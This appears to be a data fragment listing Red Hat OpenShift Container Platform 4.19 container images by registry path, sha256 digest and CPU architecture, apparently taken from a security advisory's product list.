"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
